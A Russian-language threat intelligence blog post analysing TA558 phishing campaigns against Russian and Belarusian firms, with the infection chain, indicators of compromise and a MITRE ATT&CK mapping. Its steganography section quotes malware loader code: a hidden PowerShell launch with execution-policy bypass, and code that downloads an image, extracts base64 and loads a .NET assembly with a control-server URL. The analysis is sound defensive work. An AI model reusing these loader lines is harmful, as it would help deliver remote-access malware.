Тайное послание: уловки стеганографии группы ТА558 в кибератаках на предприятия России и Беларуси | Блог F.A.C.C.T.

С начала 2024 года аналитики F.A.C.C.T. Threat Intelligence зафиксировали более тысячи фишинговых рассылок вредоносного ПО, направленных на предприятия, государственные учреждения и банки в России и Беларуси.  Целью этих рассылок была кража данных и получение доступа к внутренним системам организаций. Аналитики департамента Threat Intelligence тщательно изучили содержимое рассылок и атрибутировали эти атаки к группе ТА558.

TA558 — это киберпреступная группировка, которая занимается проведением фишинговых кампаний и распространением вредоносного программного обеспечения, ведущая свою активность с 2018 года. Основные цели группы — это финансовые учреждения, государственные организации и компании из туристической отрасли. Группа активно использует многоэтапные фишинговые атаки,  различные методы социальной инженерии для внедрения вредоносных программ на компьютеры своих жертв, размещение полезной нагрузки на легитимных серверах, а также вредоносное ПО для кражи данных и удаленного контроля над системами жертв.

Кроме указанных признаков ТА558, в новых атаках специалисты F.A.C.C.T выявили характерные для группировки методы стеганографии, то есть сокрытия информации внутри файлов или изображений, при передачи полезной нагрузки, а также использование вредоносных файлов, в именах которых были слова «Love» и «Kiss».

Большинство изученных писем содержали вредоносное программное обеспечение (ВПО) Agent Tesla или Remcos, относящееся к классу Remote Administration Tools (RAT). После запуска на компьютере жертвы, ВПО закрепляется в системе, скрывается от пользователя и предоставляет атакующему доступ к зараженному устройству. Это позволяет злоумышленнику выполнять различные действия: захватывать видео с веб-камеры, управлять буфером обмена и мышью, отображать уведомления, загружать и запускать файлы, собирать информацию о системе, скрывать экраны и окна операционной системы, записывать аудио и нажатия клавиш, а также похищать пользовательские данные.

Несмотря на то, что атаки ТА558 становятся всё более сложными и изощрёнными, система защиты от сложных и неизвестных угроз F.A.C.C.T. Managed XDR перехватила и заблокировала все вредоносные письма, направленные в адрес наших клиентов.

Исследование атак

В ходе одной из атак, зафиксированной 5 марта 2024, злоумышленниками использовалась электронная почта expo@bcmsrll[.]com, привязанная к домену bcmsrll[.]com (зарегистрирован 22.06.2023 у регистратора Namecheap Inc. США).

Изображение 1. Информация о доменном имени bcmsrll[.]com

С помощью графа сетевой инфраструктуры системы F.A.C.C.T. Threat Intelligence была выявлена связь, указывающая на использование данного домена атакующим TA558 в ходе проведения фишинговой атаки на один из банков Республики Беларусь в марте 2024 года.

Изображение 2. Связь доменного имени с группировкой TA558, выявленная с помощью графа сетевой инфраструктуры

 

TA558 известна своим использованием многоэтапных атак, начиная с фишинговых писем, содержащих вредоносные документы Microsoft Office, которые, в свою очередь, загружают и запускают вредоносные программы. В их арсенале находятся такие вредоносные программы, как AgentTesla, Remcos, njRAT и другие.

Группа часто изменяет свои тактики, методы и процедуры (TTP), чтобы избежать обнаружения и затруднить анализ их деятельности. В последнее время TA558 проявляет повышенную активность, используя более сложные техники маскировки и эмуляции легитимного поведения, что позволяет им эффективно обходить системы защиты.

Первоначальным регионом, на который была нацелена TA558 в 2018 году, являлась Латинская Америка, но позже они расширили географию атак. Их фишинговые кампании часто проводятся на нескольких языках, что указывает на глобальный масштаб операций группы.

Начало атаки

В ходе исследования специалисты компании F.A.C.C.T. выяснили, что за период с 1 января 2024 года по 25 мая 2024 года злоумышленники перемещали домен bcmsrll[.]com между тремя различными хостами.

С декабря 2023 домен был зарегистрирован на IP-адресе 185[.]236[.]228[.]95, принадлежащем провайдеру blazingfast[.]io. Затем в марте 2024 его переместили на 216[.]9[.]224[.]70, принадлежащем провайдеру dchost[.]com, а после — в мае 2024 на другой IP этого же провайдера, 213[.]142[.]149[.]158. Именно на последнем он оставался до 18 июня 2024 года.

На данных хостах злоумышленники устанавливали, настраивали и запускали почтовый сервер AutoSMTP (hxxps://www.autosmtp[.]com). В процессе настройки сервера он привязывался к домену, с привязкой к которому создавались адреса электронной почты, которые использовались для рассылки вредоносных писем.

Изображение 3. Почтовый сервер AutoSMTP, запущенный на хосте bcmsrll[.]com

Так, с начала 2024 года системой F.A.C.C.T. Managed XDR  было перехвачено 202 фишинговых письма, направленных с адресов электронной почты export@bcmsrll[.]com, expo@bcmsrll[.]com, info@bcmsrll[.]com и contact@bcmsrll[.]com, созданных на указанном домене.

Направленные письма были на русском, английском, турецком, румынском и итальянском языках. Язык выбирался в зависимости от географического расположения компании, от имени которой отправлялось письмо. Это позволило атакующим создать иллюзию доверия и значительно повысить вероятность успеха атаки.

Кроме того, электронные письма могли быть направленны как целевым образом, с указанием в тексте письма обращения к конкретному получателю, так и в ходе массовой рассылки — без какой-либо конкретики.

Информация о компаниях-отправителях, указанных в фишинговых письмах, выглядит полностью достоверной. Атакующие подбирали такие детали, чтобы создать иллюзию легитимности, и этим вводили пользователей в заблуждение.

Как только пользователь открывал такое письмо, он сталкивался с известным брендом, логотипом, убедительным текстом, который подталкивал его к дальнейшим действиям. В частности, в письме содержались четкие указания на необходимость запуска вложенного файла.

Вредоносное вложение

В случае запуска файла-вложения, формат которого был «.docx» или «.xls», происходил запуск макроса, посредством которого осуществлялось направление запроса к ресурсу hxxp://tau[.]id/0vzd8, информация о котором содержалась в теле файла.

Изображение 6. Ссылка на внешний источник hxxp://tau[.]id/0vzd8, обнаруженная в файле «oplata-29.01.24.docx»

В ходе анализа сетевого трафика, зафиксированного 29.01.2024, после осуществления ВПО доступа по указанному URL адресу, сервер вернул ответ «Moved Permanently», в заголовке «location» которого сообщил о новом пути, по которому находится интересующий ресурс. В указанном случае возвращена ссылка на документ  hxxp://139[.]144[.]212[.]135/sbi/microsoftupdationgoingformicrftofficeupgradingtonewmsofficeprotoecoltoreducethesystemwrking.doc.

Изображение 7. Ответ сервера, полученный при обращении по пути hxxp://tau[.]id/0vzd8

Кроме указанных действий, макрос из вредоносного вложения развивает еще одно направление атаки, в ходе которого с указанного хоста осуществляется загрузка VBS скрипта «xmass.vbs».

Изображение 8. Скриншот графа в интерфейсе F.A.C.C.T. Managed XDR

Изображение 9. Информация о сетевых соединениях, направленных хосту 139[.]144[.]212[.]135.

Xmass.vbs эксплуатирует уязвимость редактора уравнений в пакете Microsoft Office, известную как CVE-2017-11882, которая связана с ошибкой в обработке объектов оперативной памяти. В результате эксплуатации этой уязвимости при открытии специально созданного документа происходит переполнение буфера, что позволяет злоумышленникам выполнить произвольный код в системе жертвы.

Изображение 10. Скриншот информации об эксплуатируемой уязвимости в интерфейсе F.A.C.C.T. Managed XDR

Использование стеганографии

При дальнейшей эксплуатации ВПО осуществляет вызов Windows PowerShell, которому передаются параметры, извлеченные из файла xmass.vbs.

Как видно из представленных изображений, параметр передается с использованием методов стеганографии, что в свою очередь осуществляется с целью предотвращения возможного детектирования запускаемых процессов и инъекций в действующие.

В указанном случае переменная $codigo содержит в себе строку с данными, закодированными в формате Base64.

Метод $oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace(‘DgTre’,’A’) )) заменяет в указанной строке все вхождения подстроки «DgTre» на символ «А», после чего декодирует строку и преобразует её в Unicode, а далее запускает, после чего запускает новый скрытый экземпляр Windows PowerShell, содержащий декодированные данные powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OwjuxD.

Изображение 13. Результат декодирования переданного параметра.

В результате полученный скрипт осуществляет запуск другой версии PowerShell, находящейся по пути C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, в скрытом режиме (-windowstyle hidden) и с обходом политики выполнения скриптов (-executionpolicy bypass), а также использованием минимального профиля (-noprofile), что позволяет не загружать пользовательские профили.

Далее переменной $imageUrl присваивается адрес ресурса, на котором находится изображение hxxps://wallpapercave[.]com/uwp/uwp4246971.png, после чего осуществляется скачивание указанного изображения, его преобразование в байткод и его присвоение в переменную $imageBytes = $webClient.DownloadData($imageUrl)).

Изображение 14. Изображение, полученное в ходе аналогичного исследования

Далее байты изображения  преобразовываются в строку с использованием кодировки UTF-8 ($imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes)), после чего, с использованием специальных индексов расположенных в текстовой строке, осуществляется поиск начала и конца строки закодированной в Base64 ($startFlag = ‘<<BASE64_START>>’ и $endFlag = ‘<<BASE64_END>>’),

Изображение 15. Байт код изображение с флагом начала строки кодировки Base64

а после их нахождения извлекает строку и производит её декодирование  из Base64 ($base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command)).

Далее загружает декодированные байты как сборку .NET ($loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes)), после чего получает тип Aspose.DrawingSpec.PkikAttrCertNB из загруженной сборки, вызывает метод Run и передает ему параметры ($type.GetMethod(‘Run’).Invoke($null, [object[]] (‘http://139.144.212.135/222/GST.txt’ , ‘desativado’ , ‘2’ , ‘CHSE’ , ‘1’ , ‘C:\ProgramData\’, ‘LnkName’,’RegAsm’)), в результате чего осуществляется создание процесса Regasm.exe, посредством которого происходит заражение устройства трояном Remcos.

Изображение 16. Скриншот графа в интерфейсе F.A.C.C.T. Managed XDR.

Клиенты F.A.C.C.T. Threat Intelligence могут получить аналогичные детальные отчеты о действиях заблокированного при атаках на них или загруженного ими ВПО, с отображением ветвей процессов и используемыми тактиками и техниками в подразделе «Детонация ВПО» раздела «Трояны».

Выявление рассылки

Аналогичным образом специалистами компании F.A.C.C.T. осуществлен анализ всех экземпляров ВПО, находящихся во вложениях указанных писем, в ходе которого выявлено 23 уникальных экземпляра.


п/п
Хэш SHA-256 Название файла Дата распространения
1 8d12cfdb1376c99139b8dba94a0c02357bf7652b763d6313d70dde912266905f swift.xls 24.05.2024
2 d5e214f3096564dfc3e348b6a3ac6aeefed75d785ac7cfab5d3019f67fdbc9be Offer 15492024 & 15602024.docx 23.05.2024
3 4cc7a5fe2d2ffafda3791f0e9cced8f7fe430b598551c2a9277210e87e6df53b Sipariş detayları.xls 23.05.2024
4 4d97a5069b154b2e95af235dd32c82c1bf5b2e4cf2d188067da223f488ebaa48 ORDIN.xls 22.05.2024
5 55f02d8a8f8fe958eeb020593b48d25c86238bd2a7746b9c7b7e4afa9e88c315 Order Req. March.docx 11.03.2024
6 c0e49a1256f7e6b66607f2440219ce5e684bd591fc1fb7c64b90e9b9218374a9 Order sheet RF083901.docx 22.02.2024
7 0f9a81081fd7ff58c83c78bcfa4735556fd3ad823f917fe28787085f2d309336 P.O.27000446.docx 19.02.2024
8 bc46b7b44928f6ad586d787db33f53ed962aab72441a5518efb3e971d36a40e2 swift_3094.docx 13.02.2024, 14.02.2024
9 fda7e2d7a3ee70355988afc70ee4d6ebf08b76ef38f4504aa1cf5f8fa9a99b2e Yeni fatura.docx 08.02.2024
10 383ee0319fade807fd02f12a92d4f2b98ba7137f27212b996f3cc9bd88f278ac Applicazione di pagamento.docx 07.02.2024
11 91a14852328b337a5aa1046bc7f92448f2c0a3c2ec5a8a76729de68521fa2a39 Подтверждение заказа.xls 06.02.2024
12 91a14852328b337a5aa1046bc7f92448f2c0a3c2ec5a8a76729de68521fa2a39 MSKUJH662020SE.docx 05.02.2024
13 041c9c4e5242464f8661c6f611da14041447b368e7ff669e5de89e9f805ba486 Kopia płatności.docx 02.02.2024
14 079de6fa0a294bbab99ca481e03e5d0360cdfae1ab41ffd7cc37a92d7bcc25a1 swift Euro.xls 01.02.2024
15 18b8e4782b590141ff10ecde5b76bd1e35d99890a517741ac71408a478a56a81 Shipment Documents.docx 31.01.2024
16 32562e2a917d9827d3f24ac715a6af7468d627594c90126641349d25b735234f New order list.docx 30.01.2024
17 295aef7c1199c1f1ed7d487694e977ec858c5819140ed09808e175fcc49472f0 Оплата 29.01.24.docx 29.01.2024
18 ea17ccf4bf55f23b8a93f8e17e470be440211f463d5b7e01958843c8c160f765 Подтверждение заказа RF0901.docx 26.01.2024
19 e2ee9ac33c1e07a99f8cc6044f0a7b830e892fbfbfd7d6e8db916707e9c34035 Copie de plată.docx 25.01.2024
20 89eb53096ec6248185c7797c802d1bd9b539097f01592bfe5f9e183d753d20ce Ürün listesi.xls 24.01.2024
21 110502c15e51f07fe6aff0b0a28d128d60a1eb51df09a2b9fb2db0775fe92f28 comandă nouă.xls 23.01.2024
22 a2d5c106ced87a5771490d95bc20c385f8ae49f7e8448b2e68a3c6bf0d96d03b NEW ITEMS LIST 2024.xls 16.01.2024
23 6b19f6c758c0b626d1319314e9679d55701e156a9642409e8899a1e7d6a20026 Dekont.gz 09.01.2024

Распространение указанных файлов осуществлялось атакующими с использованием адресов электронной почты, привязанных как к указанному доменному имени, так и к вновь выявленным:

Домен Дата регистрации Регистратор
pluse-tr[.]com 16.04.2024 Namecheap Inc. США
hdvysy[.]com 21.08.2023 Namecheap Inc. США
baltictransline[.]store 21.08.2023 Namecheap Inc. США
automaxtool[.]me 07.06.2023 Namecheap Inc. США
akcalogistics[.]shop 27.13.2023 Namecheap Inc. США
naft-dz[.]shop 04.06.2023 Namecheap Inc. США
vervo[.]lat 19.12.2023 Namecheap Inc. США
laceys[.]icu 26.05.2023 Namecheap Inc. США
maximum[.]icu 21.01.2024 Namecheap Inc. США
biatr[.]ooguy[.]com Dynu System Inc. США.
abspedition[.]icu 20.01.2024 Namecheap Inc. США
midae[.]com 16.07.2023 PSI-USA Inc. США
executivesship[.]com 29.05.2023 Namecheap Inc. США

Всего за период времени с 01.01.2024 по 25.05.2024 атакующими ТА558 с использованием указанных доменных имен в адреса  производственных предприятий, учреждений государственного и банковского сектора  Российской Федерации и Республики Беларусь было направлено 1022 электронных письма, содержащих в себе ВПО.

Атрибуция атаки к TA558

Анализ обнаруженных образцов позволил специалистам компании F.A.C.C.T. связать данную атаку с ТА558 по следующим признакам:

  • Использование длинных цепочек атак;
  • Использование методов стеганографии, в ходе которых полезная нагрузка размещалась в изображениях и закодированных текстовых файлах;

Изображение 17. Передаваемая в параметре реверсированная строка URL адреса, с полезной нагрузкой содержащейся в текстовом файле.

  • Использование легитимных файлообменников для хранения файлов и изображений содержащих полезную нагрузку;

Изображение 18. Передаваемая в параметре строка URL адреса, с полезной нагрузкой, содержащейся внутри изображения.

  • Использование вредоносных файлов, имена которых состоят из многочисленных слов и в большинстве своём связаны со словами « Love» и «Kiss». Вместе с тем, в ходе анализа атак, нами обнаружены как уже указанные названия файлов, так и названия, связанные с обновлением программного обеспечения и животным миром.

Аналогичные особенности атак ТА558 отображены в отчетах исследователей:

  • https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel
  • https://cyble.com/blog/threat-actor-employs-powershell-backed-steganography-in-recent-spam-campaigns/
  • https://www.metabaseq.com/ta588/
  • https://x.com/ankit_anubhav/status/1689585087267188736
  • https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/operaciya-steganoamor-ta558-massovo-atakuet-kompanii-i-gosudarstvennye-uchrezhdeniya-po-vsemu-miru/

Кроме того, в указанных атаках использовались услуги ресурса withheldforprivacy[.]com (предоставляет услуги сокрытия реальных данных) при осуществлении регистрации доменных имен.

Изображение 23. Связь доменного имени bsmsrll[.]com с сервисом withheldforprivacy[.]com, выявленная с помощью графа сетевой инфраструктуры F.A.C.C.T.

Ключевые выводы

Проанализированная специалистами компании F.A.C.C.T. фишинговая кампания, развернутая группировкой TA558, демонстрирует значительное развитие данного вектора атак. Злоумышленники применяют ухищренные методы сокрытия и доставки ВПО, а также тщательно готовятся к каждой атаке, используя ранее не засвеченные хосты и домены.

Примечательно, что атакующие продолжают эксплуатировать уязвимость 2017 года, выявленную в Microsoft Office (CVE-2017-11882), несмотря на то, что она уже устранена в новых версиях продукта. Это свидетельствует о том, что такие атаки по-прежнему успешны и эффективны. Более того, использование устаревших уязвимостей указывает на недостаточно обновление систем у многих пользователей, что позволяет злоумышленникам легко проникать в их сети.

В последнее время TA558 стала использовать ещё более изощренные методы социальной инженерии, чтобы убедить пользователей открыть вредоносные вложения. Они маскируют свои письма под легитимные сообщения от известных компаний, что значительно увеличивает вероятность успеха атаки.

В связи с этим, мы полагаем, что TA558 продолжит осуществление рассылок вредоносного ПО указанным способом, совершенствуя свои методы и адаптируясь к новым условиям.

Рекомендации

Для предотвращения и защиты от возможных кибератак со стороны группы ТА558 специалисты компании F.A.C.C.T. рекомендуют следующие меры:

  1. Регулярно обновляйте все установленное ПО. В частности, при использовании Microsoft Office 2019 и выше уязвимость CVE-2017-11882, связанная с переполнением буфера, не будет проэксплуатирована.
  2. Регулярно обучайте сотрудников методам распознавания фишинга и других форм социальной инженерии. Это поможет сделать их менее уязвимыми.
  3. Используйте передовые решения для защиты электронной почты, с целью предотвращения вредоносных рассылок. Рекомендуем ознакомиться с возможностями F.A.C.C.T. Business Email Protection для эффективного противодействия таким атакам.
  4. Внедряйте современные средства для обнаружения и реагирования на киберугрозы. Рекомендуем рассмотреть решение F.A.C.C.T. Managed XDR, которое использует многочисленные источники телеметрии и передовые технологии машинного обучения для выявления угроз и реагирования на них.
  5. Применяйте данные F.A.C.C.T. Threat Intelligence для обнаружения угроз и проведения проактивного поиска. Это поможет вовремя идентифицировать и нейтрализовать потенциальные опасности.

Эти меры помогут значительно повысить уровень защиты ваших систем и данных от кибератак.

Индикаторы компрометации

Файловые индикаторы

swift.xls

  • MD5: fa8159d551c83cd7d529dcd3a7476961
  • SHA-1: e02e7147bfb77619291fa222bda9bb3ce4761468
  • SHA-256: 8d12cfdb1376c99139b8dba94a0c02357bf7652b763d6313d70dde912266905f

Offer 15492024 & 15602024.docx

  • MD5: 0d0f500d82551e733eab0fb1060a49da
  • SHA-1: 1e9af5dd484358b007673b0d7f9b85f8ac1a7b6c
  • SHA-256: d5e214f3096564dfc3e348b6a3ac6aeefed75d785ac7cfab5d3019f67fdbc9be

Sipariş detayları.xls

  • MD5: e1424a6dc9fa951366f2996cd537dd02
  • SHA-1: 967bf96dfb11dee4e1d711c809f8c9fedc29fa69
  • SHA-256: 4cc7a5fe2d2ffafda3791f0e9cced8f7fe430b598551c2a9277210e87e6df53b

ORDIN.xls

  • MD5: 8f82df8963d12e63c11d24991271c888
  • SHA-1: 205aa52dc1b466bb0ff5f5976288aa84e02b94e7
  • SHA-256: 4d97a5069b154b2e95af235dd32c82c1bf5b2e4cf2d188067da223f488ebaa48

Order Req. March.docx

  • MD5: 656b3681763db100b7ea580d97a16983
  • SHA-1: 76641a0aace92c72654df9b16961d2c09ab25352
  • SHA-256: 55f02d8a8f8fe958eeb020593b48d25c86238bd2a7746b9c7b7e4afa9e88c315

Order sheet RF083901.docx

  • MD5: f83f9fd222724c38642f889e4bff6dbc
  • SHA-1: 3993bebae6d4c5c0b0e494472f8f3973367d7f39
  • SHA-256: c0e49a1256f7e6b66607f2440219ce5e684bd591fc1fb7c64b90e9b9218374a9

P.O.27000446.docx

  • MD5: 11f0c45a84392c11e8d276dc6cfb429a
  • SHA-1: 3a2a02046c5ae2b4cd82b425890e198f41adf11a
  • SHA-256:  0f9a81081fd7ff58c83c78bcfa4735556fd3ad823f917fe28787085f2d309336

swift_3094.docx

  • MD5: 49a3ee37781cac92181f0c1c80e5fb0d
  • SHA-1: 6d6d1889835319c81e546728d4ec6f965ece85f0
  • SHA-256: bc46b7b44928f6ad586d787db33f53ed962aab72441a5518efb3e971d36a40e2

Yeni fatura.docx

  • MD5: 9818f83f09da7f225a28153ad607e821
  • SHA-1: 8bd40194c741c9ac9ee50c348981edca15a5519d
  • SHA-256: fda7e2d7a3ee70355988afc70ee4d6ebf08b76ef38f4504aa1cf5f8fa9a99b2e

Applicazione di pagamento.docx

  • MD5: ff3acc46bc2eaeccd03be2ff5fc3d0ec
  • SHA-1: cbd16f778666a312e141fdb1127e3ad8dc7b1712
  • SHA-256: 383ee0319fade807fd02f12a92d4f2b98ba7137f27212b996f3cc9bd88f278ac

Подтверждение заказа.xls

  • MD5: 368188588ec06a0096f2430a2f98001e
  • SHA-1: c049a051e51692f7ae82326c66a7d2a37a1d7054
  • SHA-256: 91a14852328b337a5aa1046bc7f92448f2c0a3c2ec5a8a76729de68521fa2a39

MSKUJH662020SE.docx

  • MD5: e035324087c878d26291105f711f1a2b
  • SHA-1: 86c9cf7d6085507f03c2dcb8d719e43e099c1309
  • SHA-256: eecb89aaf97fa8333c2c56c16e3905b2b2764271d7f7944bc71a8aba64d2906c

Kopia płatności.docx

  • MD5: 1832d5dcd354aacfcf9a8e15b2b18311
  • SHA-1: c709d65418d77978053aa54a33ca5829cea85d95
  • SHA-256: 041c9c4e5242464f8661c6f611da14041447b368e7ff669e5de89e9f805ba486

swift Euro.xls

  • MD5: 4a677fc6b7305b4eace2b00ac978fb76
  • SHA-1: fc965d88d8ec2f49008f93a7e906fde10cb0b947
  • SHA-256: 079de6fa0a294bbab99ca481e03e5d0360cdfae1ab41ffd7cc37a92d7bcc25a1

Shipment Documents.docx

  • MD5: f78f79a9955725001e502d0946eb3d00
  • SHA-1: 925fe336bbc98797e3efcbddc39695b7b0de5534
  • SHA-256: 18b8e4782b590141ff10ecde5b76bd1e35d99890a517741ac71408a478a56a81

New order list.docx

  • MD5: 8a10bef8547c837c442a585e36e2370d
  • SHA-1: 726afc25dbac5004232d28a2b83deb7603e6b375
  • SHA-256: 32562e2a917d9827d3f24ac715a6af7468d627594c90126641349d25b735234f

Оплата 29.01.24.docx

  • MD5: 10af82086385c6a2514d222753184317
  • SHA-1: df565f479665be322b27cb32cbd0eb513d0290ba
  • SHA-256: 295aef7c1199c1f1ed7d487694e977ec858c5819140ed09808e175fcc49472f0

Подтверждение заказа RF0901.docx

  • MD5: 1eb3ca66ec1151e2a58284ccf4e1d7c7
  • SHA-1: 83b79761ce29359817d147e56529f520b0fdcdd8
  • SHA-256:  ea17ccf4bf55f23b8a93f8e17e470be440211f463d5b7e01958843c8c160f765

Copie de plată.docx

  • MD5: 277f8f8a7b767860a8e7bf1aeaa1fd6a
  • SHA-1: 64142b293363c2a23cbda456023c9fce51b31333
  • SHA-256: e2ee9ac33c1e07a99f8cc6044f0a7b830e892fbfbfd7d6e8db916707e9c34035

Ürün listesi.xls

  • MD5: 87eabdd9eaf85ac612cc32db307462a1
  • SHA-1: 094626fb8ec66ae99ce6157fbe321d114e7fbbf8
  • SHA-256: 110502c15e51f07fe6aff0b0a28d128d60a1eb51df09a2b9fb2db0775fe92f28

comandă nouă.xls

  • MD5: 87eabdd9eaf85ac612cc32db307462a1
  • SHA-1: 094626fb8ec66ae99ce6157fbe321d114e7fbbf8
  • SHA-256: 110502c15e51f07fe6aff0b0a28d128d60a1eb51df09a2b9fb2db0775fe92f28

NEW ITEMS LIST 2024.xls

  • MD5: db896eece25221a79210eecac8d05822
  • SHA-1: fbb32ef65e661cf82b3f539ee61cc5d2dade191b
  • SHA-256: a2d5c106ced87a5771490d95bc20c385f8ae49f7e8448b2e68a3c6bf0d96d03b

Dekont.gz

  • MD5: 123ba210c4bf018520399cb6e5dd48d8
  • SHA-1: eb3c3c80485ec3a6cd10538afe94ff0065d5d7e3
  • SHA-256: 6b19f6c758c0b626d1319314e9679d55701e156a9642409e8899a1e7d6a20026

Сетевые индикаторы

Хосты

  • 139[.]144[.]212[.]135
  • 172[.]232[.]4[.]203
  • 45[.]79[.]137[.]187
  • 172[.]235[.]133[.]243
  • 172[.]233[.]129[.]114
  • 172[.]232[.]170[.]236
  • 172[.]232[.]163[.]207
  • 45[.]74[.]19[.]84
  • 70[.]34[.]197[.]128
  • 172[.]234[.]217[.]97
  • 45[.]56[.]102[.]63
  • 172[.]232[.]172[.]53
  • 172[.]232[.]189[.]152
  • 172[.]232[.]172[.]123
  • 172[.]232[.]189[.]7
  • 75[.]102[.]51[.]237

Домены

  • paste[.]ee/d/spi57
  • paste[.]ee/d/0aXad
  • tau[.]id/ze87s
  • paste[.]ee/d/5nJBg
  • paste[.]ee/d/62kvY
  • tau[.]id/c9izr
  • tau[.]id/34x8c
  • paste[.]ee/d/Pz2XE
  • ye[.]pe/0y2k
  • paste[.]ee/d/VkPF6
  • paste[.]ee/d/wsePT
  • paste[.]ee/d/S8WBJ
  • paste[.]ee/d/tggWc
  • paste[.]ee/d/7tUhO
  • tau[.]id/y3kre
  • paste[.]ee/d/Noi6G
  • tt[.]vg/IsjCX
  • paste[.]ee/d/oDnyo
  • tt[.]vg/PqPsi
  • l-to[.]com/ru7285wa
  • shtu[.]be/e79171
  • en0[.]de/serverrrrr
  • qr-in[.]com/HDYwZbx
  • isols[.]co/zXTgU
  • bot.[]ax/hNZdz
  • wallpapercave[.]com/uwp
  • tau[.]id/0vzd8
  • pluse-tr[.]com
  • hdvysy[.]com
  • baltictransline[.]store
  • automaxtool[.]me
  • akcalogistics[.]shop
  • naft-dz[.]shop
  • vervo[.]lat
  • laceys[.]icu
  • maximum[.]icu
  • biatr[.]ooguy[.]com
  • abspedition[.]icu
  • midae[.]com
  • executivesship[.]com

MITRE ATT&CK® Matrix

Tactic Technique Procedure
 

Resource Development (ТА0042)

 

Compromise Infrastructure: Server

(T1584.004)

ТА558 использовала легитимные взломанные SMTP-сервера для фишинга.
Establish Accounts: Email Accounts

(T1585.002)

ТА558 осуществляли создавала адресов электронных почт, маскируясь под легитимные организации
Stage Capabilities

(T1608)

ТА558 использовала свои сервера, легитимные сервисы и интернет ресурсы для хранения текста для загрузки на них ВПО, а также изображений и файлов байт код которых содержит полезную нагрузку.
Acquire Infrastructure

(T1583.001)

TA558 осуществляет приобретение доменов, в ходе регистрации используя сервисы сокрытия данных
Initial Access
(
TA0001)
Phishing

(T1566)

ТА558 осуществляла отправки фишинговых писем
Phishing: Spearphishing Attachment

(T1566.001)

ТА558 добавляла вредоносные docx и xls документы
Execution
(TA0002)
Command and Scripting Interpreter: PowerShell

(T1059.001)

TA558 использовала команды Windows PowerShell для загрузки данных, обфускации  полезной нагрузки и запуска ВПО
Command and Scripting Interpreter: Visual Basic

(T1059.005)

TA558 использовали скрипты Visual Basic для запуска ВПО и эксплуатации CVE
Exploitation for Client Execution

(T1203)

TA558 эксплуатировала CVE-2017-11882 Microsoft Office переполнения буфера для запуска скриптов
User Execution: Malicious File
(T1204.002)
TA558 направляла фишинговые письма, текстовая часть которых подталкивала пользователя к открытию вредоносного docx, xls документа находящегося во вложении
Defense Evasion
(TA0005)
Obfuscated Files or Information
(T1027)
ТA558 использовала кодировку base64 для сокрытия полезной нагрузки
Obfuscated Files or Information: Steganography
(T1027.003)
TA558 применяла технику стеганографии в для сокрытия полезной нагрузки в изображениях и текстовых файлах, а также параметрах передаваемых в Windows PowerShell
Masquerading: Masquerade File Type
(T1036.008)
ТА558 представляла файлы Visual Basic Script в виде изображений
Deobfuscate/Decode Files or Information
(T1140)
TA558 использовало команды позволяющее декодировать полезную нагрузку полученную в ходе атаки из изображений и файлов
Virtualization/Sandbox Evasion
(T1497)
ВПО ТА558 осуществляла контроль запуска в виртуальной машине или песочнице путем использования техник контроля наличия пользователя
Hide Artifacts:
Hidden Windows(T1564.003)
ТА558 использовала параметры передаваемые в Windows PowerShell для запуска в скрытом режиме
Credential Access
(TA0006)
Unsecured Credentials: Credentials In Files
(T1552.001)
ТА558 использовало ВПО Remcos которое осуществляло сбор данных из файлов
Unsecured Credentials: Credentials in Registry
(T1552.002)
ТА558 использовало ВПО Remcos которое осуществляло сбор данных из регистра системы
Discovery
(TA0007)
File and Directory Discovery
(T1083)
ТА558 использовало ВПО Remcos позволяющее осуществлять поиск файлов в системе, а также имеет возможности файлового менеджера
Account Discovery: Local Account
(T1087.001)
ТА558 использовало ВПО Remcos которое осуществляло сбор информации о локальной учетной записи устройства
Modify Registry
(T1112)
ТА558 использовало ВПО Remcos которое осуществляло модификацию реестра
Application Windows Discovery
(T1010)
ТА558 использовало ВПО Remcos которое осуществляло сбор информации о приложениях установленных в системе
System Location Discovery
(T1614)
ТА558 использовало ВПО Remcos которое осуществляло получение информации об локации жертвы посредством обращения к ресурсу geoplugin[.]net
Collection
(TA0009)
Browser Session Hijacking
(T1185)
ТА558 использовало ВПО Remcos которое осуществляло сбор активных сессии из браузеров
Clipboard Data
(T1115)
ТА558 использовало ВПО Remcos которое осуществляло сбор пользовательской информации из буфера обмена
Credentials from Password Stores: Credentials from Web Browsers
(T1555.003)
ТА558 использовало ВПО Remcos которое осуществляло сбор пользовательской информации из браузеров
Audio Capture
(T1123)
ТА558 использовало ВПО Remcos которое могло осуществлять снятие информации с аудиовыходов зараженного устройства
Input Capture: Keylogging
(T1056.001)
ТА558 использовало ВПО Remcos которое могло осуществлять снятие информации устройств ввода информации зараженного устройства
Screen Capture
(T1113)
ТА558 использовало ВПО Remcos которое могло осуществлять получение скриншотов
Video Capture
(T1125)
ТА558 использовало ВПО Remcos, которое могло осуществлять снятие информации с вебкамеры зараженного устройства
Command And Control
(TA0011)
Application Layer Protocol: Web Protocol
(T1071.001)
TA558 использовало ВПО Remcos, которое взаимодействовало с управляющим сервером через HTTP-протокол